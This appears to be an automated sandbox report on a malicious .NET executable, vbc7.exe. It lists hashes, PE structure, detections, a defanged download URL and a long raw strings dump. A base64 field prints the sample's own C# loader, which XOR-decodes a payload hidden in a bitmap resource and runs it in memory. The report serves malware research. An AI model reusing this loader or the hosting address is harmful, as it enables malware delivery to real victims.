MalScore
100/100
MalFamily
Malicious

vbc7.exe

Is DLL Packer Anti Debug Anti VM Signed XOR AntiVirus 21/68 Related 2164
File details Download PDF Report
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
File size: 211.00 KB (216064 bytes)
Compile time: 2018-04-26 18:52:48
MD5: 1e1ae714a78d5672d7c6c1abd1bb75b6
SHA1: e5fde5dcba9b86f3fc52f958a0c69aa08351a271
SHA256: a6fe913594a4bd9f2a134d29fb4c8f6be7ab6b58e95004f6e8ae2736812577e5
Import hash: f34d5f2d4577ed6d9ceec516c1f5a744
Sections 3 .text .rsrc .reloc
Directories 3 import resource relocation
First submission: 2018-04-27 09:27:03
Last submission: 2018-04-27 09:27:03
Filename detected: - vbc7.exe (1)
URL file hosting
hXXp://23.249.161.109/c/vbc7.exeVirusTotal
Antivirus Report
Report Date Detection Ratio Permalink Update
2018-04-27 06:08:54 [21/68] VirusTotal
PE Sections 2 suspicious
Name VAddress VSize Size MD5 SHA1
.text 0x2000 0x2bc4 11264 a59b4e0a85afa92ae876055d7fd16c8f 39d94de55c214a2ac607f1a664c013d5817ff403
.rsrc 0x6000 0x31a96 203776 61cd862cdbf807b17f3ca60fcf9a26c8 a4cc13497b06755f09759bf595930fa4cfb9f060
.reloc 0x38000 0xc 512 9fb94b98cec971d88bc12e68c4f73347 f299ca17a34afb372f50763e71bd7e510e22dc11
PE Resources
Name Offset Size Language Sublanguage Data
RT_ICON 0x6a50 1384 LANG_NEUTRAL SUBLANG_NEUTRAL
RT_GROUP_ICON 0x6fb8 34 LANG_NEUTRAL SUBLANG_NEUTRAL
RT_VERSION 0x6fdc 652 LANG_NEUTRAL SUBLANG_NEUTRAL
RT_HTML 0x7268 198212 LANG_GERMAN SUBLANG_GERMAN
RT_MANIFEST 0x378ac 490 LANG_NEUTRAL SUBLANG_NEUTRAL
  • API Alert
  • Anti Debug
Meta Info
LegalCopyright:
Assembly Version: 0.0.0.0
InternalName: DdlvB7wF9H2w7TrM.Program.exe
FileVersion: 0.0.0.0
FileDescription:
Translation: 0x0000 0x04b0
OriginalFilename: DdlvB7wF9H2w7TrM.Program.exe
ProductVersion: 0.0.0.0
XOR
No XOR informations found in this file.
Signature
This file isn't digitally signed
Packer(s)
Microsoft Visual C# / Basic .NET
Microsoft Visual Studio .NET
.NET executable
Microsoft Visual C# v7.0 / Basic .NET
File found
FIle type: Library
mscoree.dll
IP Found
No IP detected
URL(s)
No URL found
String too long
dXNpbmcgU3lzdGVtOw0KdXNpbmcgU3lzdGVtLklPOw0KdXNpbmcgU3lzdGVtLlRleHQ7DQp1c2luZyBTeXN0ZW0uUmVmbGVjdGlvbjsNCnVzaW5nIFN5c3RlbS5UaHJlYWRpbmc7DQp1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7DQp1c2luZyBTeXN0ZW0uRHJhd2luZzsNCg0KbmFtZXNwYWNlIGxTYkRRcEdzRGtocw0Kew0KCXB1YmxpYyBjbGFzcyBPe3B1YmxpYyB2b2lkIG4oKXsNCmRvdWJsZSBwID0gODIuNDE2NTU7IAp3aGlsZShwID09IC0xLjI0NjcyRSsyMCl7DQpwID0gTWF0aC5Qb3coMiwgMi4xKTsNCg0KfQ0KfQp9IA0KDQogICAgY2xhc3MgUHJvZ3JhbQ0KICAgIHsNCg0KICAgICAgICBzdGF0aWMgc3RyaW5nIEZtYUdDYnRwenV5T3kgPSAiI3Bhc3MjIjsNCiAgICAgICAgcHJpdmF0ZSBzdGF0aWMgYnl0ZVtdIGN3aUxjeXAoYnl0ZVtdIGJ5dGVzKQ0KICAgICAgICB7DQogICAgICAgICAgICBieXRlW10gYnl0ZUFycmF5ID0gRW5jb2RpbmcuVW5pY29kZS5HZXRCeXRlcyhGbWFHQ2J0cHp1eU95KTsNCiAgICAgICAgICAgIGZvciAoaW50IGkgPSAwOyBpIDwgYnl0ZXMuTGVuZ3RoOyBpKyspDQogICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgYnl0ZXNbaV0gXj0gYnl0ZUFycmF5W2kgJSAxNl07DQogICAgICAgICAgICB9DQogICAgICAgICAgICByZXR1cm4gYnl0ZXM7DQogICAgICAgIH0NCgkJDQoJCXByaXZhdGUgc3RhdGljIGJ5dGVbXSBDb252ZXJ0RnJvbUJtcChTeXN0ZW0uRHJhd2luZy5CaXRtYXAgYikNCiAgICAgICAgew0KICAgICAgICAgICAgaW50IGwgPSBiLldpZHRoOw0KICAgICAgICAgICAgaW50IG4gPSBsICogbCAqIDQ7DQogICAgICAgICAgICBieXRlW10gYnVmZiA9IG5ldyBieXRlW25dOw0KICAgICAgICAgICAgaW50IGsgPSAwOw0KDQogICAgICAgICAgICBmb3IgKGludCB4ID0gMDsgeCA8IGw7IHgrKykNCiAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICBmb3IgKGludCB5ID0gMDsgeSA8IGw7IHkrKykNCiAgICAgICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgICAgIEJ1ZmZlci5CbG9ja0NvcHkoQml0Q29udmVydGVyLkdldEJ5dGVzKGIuR2V0UGl4ZWwoeCwgeSkuVG9BcmdiKCkpLCAwLCBidWZmLCBrLCA0KTsNCiAgICAgICAgICAgICAgICAgICAgayArPSA0Ow0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgaW50IGxlbiA9IEJpdENvbnZlcnRlci5Ub0ludDMyKGJ1ZmYsIDApOw0KICAgICAgICAgICAgYnl0ZVtdIGYgPSBuZXcgYnl0ZVtsZW5dOw0KICAgICAgICAgICAgQnVmZmVyLkJsb2NrQ29weShidWZmLCA0LCBmLCAwLCBmLkxlbmd0aCk7DQogICAgICAgICAgICByZXR1cm4gZjsNCiAgICAgICAgfQ0KCQkNCgkJDQoJCXN0YXRpYyBieXRlW10gdE1qQno7DQoJCXB1YmxpYyBzdGF0aWMgdm9pZCBrUXdsZWpwZ2FqVE9mUEJiKCkNCgkJew0KCQkJQXNzZW1ibHkuTG9hZCh0TWpCeikuRW50cnlQb2ludC5JbnZva2UobnVsbCwgbmV3IG9iamVjdFtdIHsgbmV3IHN0cmluZ1tdIHsgfSB9KTsNCgkJfQ0KCQkNCgkJW0RsbEltcG9ydCgia2VybmVsMzIuZGxsIildDQoJCXN0YXRpYyBleHRlcm4gSW50UHRyIEZpbmRSZXNvdXJjZShJbnRQdHIgaE1vZHVsZSwgSW50UHRyIGxwTmFtZSwgSW50UHRyIGxwVHlwZSk7DQoJCQ0KCQlbRGxsSW1wb3J0KCJrZXJuZWwzMi5kbGwiLCBTZXRMYXN0RXJyb3I9dHJ1ZSldDQoJCXN0YXRpYyBleHRlcm4gdWludCBTaXplb2ZSZXNvdXJjZShJbnRQdHIgaE1vZHVsZSwgSW50UHRyIGhSZXNJbmZvKTsNCgkJDQoJCVtEbGxJbXBvcnQoImtlcm5lbDMyLmRsbCIsIFNldExhc3RFcnJvcj10cnVlKV0NCgkJc3RhdGljIGV4dGVybiBJbnRQdHIgTG9hZFJlc291cmNlKEludFB0ciBoTW9kdWxlLCBJbnRQdHIgaFJlc0luZm8pOw0KCQkNCgkJW0RsbEltcG9ydCgia2VybmVsMzIuZGxsIildDQoJCXN0YXRpYyBleHRlcm4gSW50UHRyIExvY2tSZXNvdXJjZShJbnRQdHIgaFJlc0RhdGEpOw0KCQkNCg0KCQlwdWJsaWMgc3RhdGljIEJpdG1hcCBCeXRlMkltYWdlKGJ5dGVbXSBpbWcpDQogICAgICAgIHsNCiAgICAgICAgICAgIHVzaW5nICh2YXIgc3RyZWFtID0gbmV3IE1lbW9yeVN0cmVhbShpbWcpKQ0KICAgICAgICAgICAgew0KICAgICAgICAgICAgICAgIHJldHVybiBuZXcgQml0bWFwKHN0cmVhbSk7DQogICAgICAgICAgICB9DQogICAgICAgIH0NCgkJDQogICAgICAgIHN0YXRpYyB2b2lkIE1haW4oKQ0KICAgICAgICB7DQogICAgICAgICAgICB0cnkNCiAgICAgICAgICAgIHsJCQ0KCQkJCUludFB0ciBmUmVzb3VyY2UgPSBGaW5kUmVzb3VyY2UobmV3IEludFB0cigwKSwgbmV3IEludFB0cigxMDUpLCBuZXcgSW50UHRyKDIzKSk7DQoJCQkJdWludCBzUmVzb3VyY2UgPSBTaXplb2ZSZXNvdXJjZShuZXcgSW50UHRyKDApLCBmUmVzb3VyY2UpOw0KCQkJCUludFB0ciBsUmVzb3VyY2UgPSBMb2FkUmVzb3VyY2UobmV3IEludFB0cigwKSwgZlJlc291cmNlKTsNCgkJCQlJbnRQdHIgZFJlc291cmNlID0gTG9ja1Jlc291cmNlKGxSZXNvdXJjZSk7DQoJCQkJDQoJCQkJdE1qQnogPSBuZXcgYnl0ZVtzUmVzb3VyY2VdOw0KCQkJCVN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5NYXJzaGFsLkNvcHkoZFJlc291cmNlLCB0TWpCeiwgMCwgU3lzdGVtLkNvbnZlcnQuVG9JbnQzMihzUmVzb3VyY2UpKTsNCgkJCQl0TWpCeiA9IGN3aUxjeXAoQ29udmVydEZyb21CbXAoQnl0ZTJJbWFnZSh0TWpCeikpKTsNCgkJCQkNCgkJCQlTeXN0ZW0uVGhyZWFkaW5nLlRocmVhZCB0aHIgPSBuZXcgU3lzdGVtLlRocmVhZGluZy5UaHJlYWQoa1F3bGVqcGdhalRPZlBCYik7DQoJCQkJdGhyLlN0YXJ0KCk7DQogICAgICAgICAgICB9DQogICAgICAgICAgICBjYXRjaA0KICAgICAgICAgICAgew0KDQogICAgICAgICAgICB9DQogICAgICAgIH0NCiAgICB9DQoJDQoJcHVibGljIGNsYXNzIEt7cHVibGljIHZvaWQgaSgpew0KZG91YmxlIHAgPSA4Mi40MTY1NTsgCndoaWxlKHAgPT0gLTEuMjQ2NzJFKzIwKXsNCnAgPSBNYXRoLlBvdygyLCAyLjEpOw0KDQp9DQp9Cn0gDQp9
sJLOdyYaoqRy
dXNpbmcgU3lzdGVtOw0KdXNpbmcgU3lzdGVtLklPOw0KdXNpbmcgU3lzdGVtLlRleHQ7DQp1c2luZyBTeXN0ZW0uUmVmbGVjdGlvbjsNCnVzaW5nIFN5c3RlbS5UaHJlYWRpbmc7DQp1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7DQp1c2luZyBTeXN0ZW0uRHJhd2luZzsNCg0KbmFtZXNwYWNlIGxTYkRRcEdzRGtocw0Kew0KCXB1YmxpYyBjbGFzcyBPe3B1YmxpYyB2b2lkIG4oKXsNCmRvdWJsZSBwID0gODIuNDE2NTU7IAp3aGlsZShwID09IC0xLjI0NjcyRSsyMCl7DQpwID0gTWF0aC5Qb3coMiwgMi4xKTsNCg0KfQ0KfQp9IA0KDQogICAgY2xhc3MgUHJvZ3JhbQ0KICAgIHsNCg0KICAgICAgICBzdGF0aWMgc3RyaW5nIEZtYUdDYnRwenV5T3kgPSAiI3Bhc3MjIjsNCiAgICAgICAgcHJpdmF0ZSBzdGF0aWMgYnl0ZVtdIGN3aUxjeXAoYnl0ZVtdIGJ5dGVzKQ0KICAgICAgICB7DQogICAgICAgICAgICBieXRlW10gYnl0ZUFycmF5ID0gRW5jb2RpbmcuVW5pY29kZS5HZXRCeXRlcyhGbWFHQ2J0cHp1eU95KTsNCiAgICAgICAgICAgIGZvciAoaW50IGkgPSAwOyBpIDwgYnl0ZXMuTGVuZ3RoOyBpKyspDQogICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgYnl0ZXNbaV0gXj0gYnl0ZUFycmF5W2kgJSAxNl07DQogICAgICAgICAgICB9DQogICAgICAgICAgICByZXR1cm4gYnl0ZXM7DQogICAgICAgIH0NCgkJDQoJCXByaXZhdGUgc3RhdGljIGJ5dGVbXSBDb252ZXJ0RnJvbUJtcChTeXN0ZW0uRHJhd2luZy5CaXRtYXAgYikNCiAgICAgICAgew0KICAgICAgICAgICAgaW50IGwgPSBiLldpZHRoOw0KICAgICAgICAgICAgaW50IG4gPSBsICogbCAqIDQ7DQogICAgICAgICAgICBieXRlW10gYnVmZiA9IG5ldyBieXRlW25dOw0KICAgICAgICAgICAgaW50IGsgPSAwOw0KDQogICAgICAgICAgICBmb3IgKGludCB4ID0gMDsgeCA8IGw7IHgrKykNCiAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICBmb3IgKGludCB5ID0gMDsgeSA8IGw7IHkrKykNCiAgICAgICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgICAgIEJ1ZmZlci5CbG9ja0NvcHkoQml0Q29udmVydGVyLkdldEJ5dGVzKGIuR2V0UGl4ZWwoeCwgeSkuVG9BcmdiKCkpLCAwLCBidWZmLCBrLCA0KTsNCiAgICAgICAgICAgICAgICAgICAgayArPSA0Ow0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgaW50IGxlbiA9IEJpdENvbnZlcnRlci5Ub0ludDMyKGJ1ZmYsIDApOw0KICAgICAgICAgICAgYnl0ZVtdIGYgPSBuZXcgYnl0ZVtsZW5dOw0KICAgICAgICAgICAgQnVmZmVyLkJsb2NrQ29weShidWZmLCA0LCBmLCAwLCBmLkxlbmd0aCk7DQogICAgICAgICAgICByZXR1cm4gZjsNCiAgICAgICAgfQ0KCQkNCgkJDQoJCXN0YXRpYyBieXRlW10gdE1qQno7DQoJCXB1YmxpYyBzdGF0aWMgdm9pZCBrUXdsZWpwZ2FqVE9mUEJiKCkNCgkJew0KCQkJQXNzZW1ibHkuTG9hZCh0TWpCeikuRW50cnlQb2ludC5JbnZva2UobnVsbCwgbmV3IG9iamVjdFtdIHsgbmV3IHN0cmluZ1tdIHsgfSB9KTsNCgkJfQ0KCQkNCgkJW0RsbEltcG9ydCgia2VybmVsMzIuZGxsIildDQoJCXN0YXRpYyBleHRlcm4gSW50UHRyIEZpbmRSZXNvdXJjZShJbnRQdHIgaE1vZHVsZSwgSW50UHRyIGxwTmFtZSwgSW50UHRyIGxwVHlwZSk7DQoJCQ0KCQlbRGxsSW1wb3J0KCJrZXJuZWwzMi5kbGwiLCBTZXRMYXN0RXJyb3I9dHJ1ZSldDQoJCXN0YXRpYyBleHRlcm4gdWludCBTaXplb2ZSZXNvdXJjZShJbnRQdHIgaE1vZHVsZSwgSW50UHRyIGhSZXNJbmZvKTsNCgkJDQoJCVtEbGxJbXBvcnQoImtlcm5lbDMyLmRsbCIsIFNldExhc3RFcnJvcj10cnVlKV0NCgkJc3RhdGljIGV4dGVybiBJbnRQdHIgTG9hZFJlc291cmNlKEludFB0ciBoTW9kdWxlLCBJbnRQdHIgaFJlc0luZm8pOw0KCQkNCgkJW0RsbEltcG9ydCgia2VybmVsMzIuZGxsIildDQoJCXN0YXRpYyBleHRlcm4gSW50UHRyIExvY2tSZXNvdXJjZShJbnRQdHIgaFJlc0RhdGEpOw0KCQkNCg0KCQlwdWJsaWMgc3RhdGljIEJpdG1hcCBCeXRlMkltYWdlKGJ5dGVbXSBpbWcpDQogICAgICAgIHsNCiAgICAgICAgICAgIHVzaW5nICh2YXIgc3RyZWFtID0gbmV3IE1lbW9yeVN0cmVhbShpbWcpKQ0KICAgICAgICAgICAgew0KICAgICAgICAgICAgICAgIHJldHVybiBuZXcgQml0bWFwKHN0cmVhbSk7DQogICAgICAgICAgICB9DQogICAgICAgIH0NCgkJDQogICAgICAgIHN0YXRpYyB2b2lkIE1haW4oKQ0KICAgICAgICB7DQogICAgICAgICAgICB0cnkNCiAgICAgICAgICAgIHsJCQ0KCQkJCUludFB0ciBmUmVzb3VyY2UgPSBGaW5kUmVzb3VyY2UobmV3IEludFB0cigwKSwgbmV3IEludFB0cigxMDUpLCBuZXcgSW50UHRyKDIzKSk7DQoJCQkJdWludCBzUmVzb3VyY2UgPSBTaXplb2ZSZXNvdXJjZShuZXcgSW50UHRyKDApLCBmUmVzb3VyY2UpOw0KCQkJCUludFB0ciBsUmVzb3VyY2UgPSBMb2FkUmVzb3VyY2UobmV3IEludFB0cigwKSwgZlJlc291cmNlKTsNCgkJCQlJbnRQdHIgZFJlc291cmNlID0gTG9ja1Jlc291cmNlKGxSZXNvdXJjZSk7DQoJCQkJDQoJCQkJdE1qQnogPSBuZXcgYnl0ZVtzUmVzb3VyY2VdOw0KCQkJCVN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5NYXJzaGFsLkNvcHkoZFJlc291cmNlLCB0TWpCeiwgMCwgU3lzdGVtLkNvbnZlcnQuVG9JbnQzMihzUmVzb3VyY2UpKTsNCgkJCQl0TWpCeiA9IGN3aUxjeXAoQ29udmVydEZyb21CbXAoQnl0ZTJJbWFnZSh0TWpCeikpKTsNCgkJCQkNCgkJCQlTeXN0ZW0uVGhyZWFkaW5nLlRocmVhZCB0aHIgPSBuZXcgU3lzdGVtLlRocmVhZGluZy5UaHJlYWQoa1F3bGVqcGdhalRPZlBCYik7DQoJCQkJdGhyLlN0YXJ0KCk7DQogICAgICAgICAgICB9DQogICAgICAgICAgICBjYXRjaA0KICAgICAgICAgICAgew0KDQogICAgICAgICAgICB9DQogICAgICAgIH0NCiAgICB9DQoJDQoJcHVibGljIGNsYXNzIEt7cHVibGljIHZvaWQgaSgpew0KZG91YmxlIHAgPSA4Mi40MTY1NTsgCndoaWxlKHAgPT0gLTEuMjQ2NzJFKzIwKXsNCnAgPSBNYXRoLlBvdygyLCAyLjEpOw0KDQp9DQp9Cn0gDQp9
VarFileInfo
InternalName
fqrKbyoRqnmt
lld.tnemeganaM.metsyS
2f212
StringFileInfo
Translation
Assembly Version
FileVersion
VS_VERSION_INFO
lld.gniwarD.metsyS
000004b0
ProductVersion
FileDescription
lld.eroC.metsyS
0.0.0.0
OriginalFilename
exeniw:tegrat/ +gubed/ 68X:mroftalp/ +ezimitpo/
LegalCopyright
eef2f
;Zq{
DdlvB7wF9H2w7TrM.Program.exe
#ssap#
lld.metsyS
#emanser#
:SPr
I;o_*
]^0
A5+:6-<
9U%SQe
,^
Al^*
OQg yL
NF5M
PNG
4n 2IE
;h :-0
F w!
@E9O
h_r|
C}wk
z$ox
=OWX+B
m&H6
*L"/
|N/hL\O
F4h6
_BdZW
||<5
)d>'
DQK*t
=Txz
+! *
b^RY
?0^E(}
9qrn
vI4|
rO2SA
9mv,;C |GW
?A=0
R~*f%
Fm?;
V-4(9
zK+v
H-=o
R</QM
PwCI
}&7\
9H}c
Gx t
=,fy
~!C(
y&U\4
#uC<2
Js% @
<KY
q>N|
]T/X-!{3
$$DAVZx
Tk7<
smethod_0
R4xM
O1\?f
LPZ %
(9$o3K
JZ*3:
<HC+R
V ~=
W5":s"
[ H :^s
T +q
x98
kN'N
lDmK
!D)]
e{%my
=0G}
8P!O
J;T
ServiceNameElement
M*|C
Zv},
NDYr
tSSb
{?Li
L2/us
H?'2+
+v}/
oVe|
UH}g
' 8Q
2>(1h
cKw.
~w+*Y
]xl&
iXl]
k>A6
q|}l0
402
58 =
D& >
N6Sh)
o1Mu
IDATx^l}
`l?u
;N-V
MonitorEnumCallback
9 EH
i9~c_M
Y!4F
s >0
}S#wx
Rk_j
VBNn~
6f/U
eS |
aiuB
*d(*
Wr;=<
eW0{
J:X='(
_b4O
oNu%
8%4e
t 19
|Fj*
lPr0
; ~y
h+3
!^"8`
!~Q~
nOfL
d-v
{QAJI
9<Po
Y]%12
kq1f
6Jtb
=mVB
T;P9_)
,6Di
-iNW
VO6R
Format
11+
soB=s8T
Jq*(c
m-f?
F~oXz
Mta
<7&Cy
wYPR
E=6Z
>U+>
~OeCO
zn kT
Nx;E'~
4|L8
tgA\
~\yOZ
*7tR
lf;3
7t(b
d:Fk
Lm|U
/Gzrz
VW \'
C|pe
QZwM
)M^nr
%H3+
kTTz
=LR _
VRC_
bI7H4
E`,!
1DS`$
XEP+
P,:q
%JQ/
b%,x
HNH4
FromBase64String
'P 0
}[v
j>w-
"%J,5
?R3%
HIVYd}/
7$Gn
KL5L,
xY)E
ICr[
J @VjLJ
_vfZ>
<d}cA
7<lwv,
\$:A
|qJ
H>%B
5_c[
'rQS'tO
zS<c
-'}67
\:4l
#Blob
eKVy
_}GS
Rw'K
eg@ mU4
QP#
~v)\\T
h,v
=4xx
ci*=}
5H*r
Imfs
u L
-*6)
$ 61y)
1vq
v(;l
gprz
IVX2
n"~Y
h@ s
xt(K
>9C;?
r| U
6_qN
Y@D2
} I0
+jx1}g
hN\
oJ:#%.
0Da5
(k04
Al#zz
V;=N
hLt<z
7&2r#y$
kL~
wL3z
HX=}_
M}=':
K_L`
@>Z"b
x=K
O7/G=
RI`]
Ul[y
s}tR
u&cz
}Q)D
_$|X~
zH"-K<R
86om}
7<l^
y{
?U=?=
e~Y?
y rq
tV|LL
q&_|
ZoaV
s-Yx"
p*4
?J|{R
(4*l
6,-_
#& 1
oBt\
= Di;
bDs#
d~!"i
Zp)v
v|y0
9KpkW4
HS=L.
y R#
B@">
_K<R
_X5|DN
9F! L
9i$\
=5hO
!-,S
'ORQ
G!> O_
av{se
jr*"
c X2.B]25
>G<4
S&a%
V>8w
SplitterEventArgs
c*
<|n{
@&`'
HRMTi
[/3vl
a>2'w$
9`ZXN
}e.V|G
=QZpNq
3#8]!
BY@CB
@c4m
g;f_
?w+l
L]
_1b}
[{{&
$G
:]s(
oz o
DYlzY
2qy
P-C$
.text
?[)t
GetString
S6|P
VsSX
w0@U
5a >)4I
w[`9%)
Yi W
0}2i
y0?3Z
:$aXP9G}e
qG|s
C2M
4^lg2
f`!;
Convert
wnmA
D7$Ik
>%6
'(Dm
8W$c
N8c
C*br
Ga%r
'}6-
BW_d
C94
SsP&K
L>Nc
U/B<
[&GM
Mm9X3
NYG-
.KPJ
CodeDomProvider
:?8X
=V q
ddSd
955b
9FAjk
2a)(
r"r
}Sk=
Xg-h
dXFg
%r >
y,_fy
IdV
6v%
*&=E
A2I"q
EH"B
$3{PStb
1 N<[>\o
#&`8
ewi{
[sF c
6ozsE
Q\3q
v$"g
8N3q
8El>
I;[i(ZU
~"yW
\PT{
w+/}yckh
"Ir1$
5r%e
C3om/}z
_3?U
6@}6
5IC{y
Uz[
/6+FA
Ac.p+C
M1xA
`.rsrc
b{{m
sP4T|
g,eg
ni P
RR=K
F6QFk
]EB
T@ +
uq>g5
k?U_{
/5(#.-?;?
=?Y
,5wMe
7W3xqW2
@_L (
qMr$
F%X:x
ifCMo/
+ntg
&8\px
GfQ S
[ 0Oq
rLd_
[L<b
( @!^
r.Ck
hrG
)dfxn
lOS&
z%mV
> FBc
IBb-y
]=Z~dy
~&]U
,x43d|
7"v
!M9K
Ph4
aI*
.~gQ
SF;
U:k6
(u`1
26?
x A{p
7\NL
VA)H N'
f&<n
H8<;
60hr:l4b>9
bbX"r}'
F!,+
Uo.m
Q-@<
% ,4 )JxK
8 5
_sk s( (:6
@Axnd
en*'n
2dn-
Y`?|
ZLwM&
5 "**(0
pqD|
'#m2)
ZVDs
~ '35/+
Oo 9
jFT.
StringCollection
O4AQJ
P/a6
=gfM
V Y^
x~G
KMH|#
55jSyB2
[s
lnm;v
Ws"Q
?#Go
H0!
5 b`
d}Sq$`(
\).k
},C1
^y`Zx>
$ccOgT
;eoq
k-w To
<vDQ
0 CLN
2|n"
'xdQ
RST4~n
Uj}t-f
`Ub\
%;A
xG>k
0H4H
Z'~4
]/fS
p|4z.
9 9
*[ (
JL{5
~V"#1
CounterSample
\Ds*`
'uXs6
1H?'R[{
As1v
+1w#
2hEj
MFuIp
hNS,
RvL|
#-P
P kZ
X`'S*
(Eri
~ ",`m
umKF
3w85
g'>u
b7w$
0-0?
(d"S
"GsB
UW0$
x/>|
f/;:
:&XlihI
N>\
90FD
& o
%R t
H/LS3
u-rkM]w
Og(6
}X|F
F4'3/
~2M4
4eV
/W >L?
%7 (
V\wb
7.X\C
IHDR
WrapNonExceptionThrows
= (l{6
=eja
Kf'a
g(^
| >~
)n;
h])W
@h_jQ
@\D"3X
lG<
o OBM]f
i.om
1'1,
DtP&q
Jy.py
zK5D}*
(KL_
B0 g
, >?
TB-3
DG#m
8% #
#Z$D
o.##
7|xe/m
$p ^
&/|F
mv[V-YQma
G >
.. )
dd>|,
Qz"7%>#!
mLO8d
.PPP
,PDo_
A),I)
j12Q
w 7
G1-_
Mi\; p~4
'].#
KyN6
^Dfh2
SmiOrderProperty
X,Bi
bm=8
7v(\
o6WMfz
sS5+Q$
R[;U
FM.&
cz /
-'>|b
r.C .m
Nb%z
<9Xs
System
xAv3
. ,z
Microsoft.CSharp
aq+
qi2
_$@ }
)O|}3
v{.
1 ,U
CryptoKeyRights
ZH|#
#-mH
nwt}
Zv5`Q
[ G,
rB8<
e64&/
e TM
=nQs
9(Xw
-O!.
Qg:4
d PecP
HK#ue
I_^1
E\?@
~{qE
MethodBase
#Strings
h ?^
WA}t
u;nf
[eV<
+yCArw
PfT.
SKRa
`ZVzk{
M3}q
lS`
ht2dJ
/LSL
Caa/*
:(v-
YP=
O]5G
>8,p
(H3DSCY
z^+x
,9i<8
Environment
U 5eE
frg#
v#TU
1lUk
l_Ipv
l|5
ZZx
WNwb
<d^'
| )J5
G2)`
='Eh
xBeK
"V^V
Vip.
get_EntryPoint
df^PPl
d ZR
AfS{
']Nn15
lsaF
5 e]
?50-.
wvN0#
GdfA
H;$}
|)[@
uPjr
System.Diagnostics
(xY#
}> [
+"ONA
6P "
yu&I
0mPXOe
KqS-
w` I
Xj?qn
y{NR
G}^<
; 0P
Ri;gk5
'7Jl
;Z',H
1w{P/vR
R$ '
O F
rY(G{
96+1 (
~ (\
CP(F
s
K%He
oJ p
Grp|F4
8l>^,
77nP{
<=tq
_fd<5
snpbh
yTRIw
3%hY"
s#*J
yY+x
?}kC
-F:h
&T$N
,'W[o
"?*-
G^_O_I
)\1Z
I> y
mx @
CompilerResults
Zdn-
P]*X
/i;Xn@z |
r. 5
D0{9
qAqw
0f p_`hJ"
L_ZbK
>>uF
\-Ee
v4ol
[tbR
d:aP
,@a<
<=z&
7X@c
`]Bv{
aX*Z
get_UTF8
$Kgq
#oY}I
De~Dv]K
nwW~
a>TP
eQ o=
TPsoy
M,i8
$D< `
c<X3f
@$w}
$C":J
]yI=
ErrArgKind
/4%-i
Yi}/
Hc[A
SRS0
;~ O j
BcL*
pco^<
3^<Mk
"58_2
$2kK
c=o
C*xR
M"Rxi
C$1
Te\Pyy
YWAwJ
hNt)
xkJ
=|7s
Wpkn
3(B;j
fIDa
@_
|KSp
!`a>
L.*]
<ADR
: N$
iT-1
SOIqr:
Q!1N
/5XsF
l{_,v
g gV<
na@u
=Eos9
sbf_
W ` C
/7l>
5QF}
Z!RX
&z';
ATqS
]Rlk
z1)eO!
c)+I
Athm
w:XF
8R`~
Z)D<g+
$#ILk
}g c
M7lG
q&@B
gAR
>-|G
Ig,`
S Sw
h!+
z!i6B
*#[Y
5HZ#
%* V
G!{u
T/=Gr
Nx* fK
w;an4j
>Q}|
~Abs
c%3l
svG4I [
ercK
:21}
WzNJ
bfja^"_
,'O*
A@*2
4Crk
~m~
}:|>
3^3v3p
,'*b
Q`,`)
,z<e
si.J
:_[i
9a`I
6Q76
0O(E2
|r,.
=byI
0<; e
Z /.+)7
1\7|d*u
vZ[Z
~ns`
q^ILG
$PQd5
S>Z:
r"e3
Z5W+
f0@
YBPB/F)'dfH
} VE
4Ab3
hmb:
TfF@
!dU=
\b*!;
vh7?
"EA4
;cb#dd
;y+
(o0L
y(^
5\dn-
h(e.
2bz`
qv6{
Z1q0
"V_4
CompileAssemblyFromSource
eS;r=
nsW
645S
System.CodeDom.Compiler
E'-fh
sP/
/ hrGs
0&cE
!-=F
Gg3
?yKxN
yJiT
@9lA
^]]p L
zny
f A:
QJ%{ ic
QS<6
<u{
Sg[o
kf7,Q
$^pk*%"3
k&h?
bS2-
-84w|
pN[7
Go?>_u68
C_@7
>mn3
TD~/
V(kM 0
:W~
%^&,fZ
:~'C
<qi`
HaTj
rm&T
/"V ,|6
ejn=
/QJE
\W$_
2bDQ
4I5 !
G =\
$+e p
Ke_U
m.a
q(m}
7r/C
<F3P
c:S0
*ihC
US}4?&Hyk
] Tz9
Yf(
N`]rV
t h
)\5\=
I0GE
t _/d
yM=f
TVr|
5gF.
}[$F
bhwu
]a9`p
IC[Z
rnR*
FriendAccessAllowedAttribute
b:8 !
-Mqd/>1
Ru`M
(KzN(o
K&GN
C hW
y0h*
3`Y{,
!o2j
*j.%
*|+S
?or
-]&(
%.Mw+w06
.\*Wj)
CB X
?'/6!3 ?
y( r
-1C]I
_z%p}
M[7x
nJXN
2zf'
^uCw\n
args
^GZ-
z3+%
v,XE
bbL
7 X
'1M!
k[@r7
1[ap
'zGX
mu:5T
T k
VHN_
^fq9
2#;[
oI8,=u
m4KK
zc6M
& =Q
}RJ Sr
,t{W2W
?REe7
@.?*P
%}gE,
# )SI
<5hWQ
OUO&
V"op
r.
`G7 uka
j^'O
DAlU
~f.ki
It4G
dg{Q'oj
<FY$u}
w:]v
m>R[
:daL
+.!<
%Wat
-bhW
!tF
wTBQ
: ZG
4FU6?
O<1#3h"
'SBE.
R4o1
D"b+
` XX1TNNJLN2'
XB6`
;vdcH
7zVL
6_QY
pHYs
.ctor
^OEX
I_w
?a:5
Y4/N
2$I[
'k y
8fa{Z<
"V iz
ALr4
W(w{
Q1,i
b6 "
yq"~|
>~k\d
HPy{
&u;P
r4j!*
Invoke
v )@
^zye
+k:c
iw}`
EfgK)
#/%(%2
.*y1X
uo}t
2!%g
0@cu5H
C% a
QLE-
v4.0.30319
AX1'UE
BI a
TYu}
tPR.
txiOEmj
xNR)
C|$%
f|/,~
'6o
|92Gw
nxX(o^ 2
Ja&6
8,hN
mbev
z&R[{
*w|G
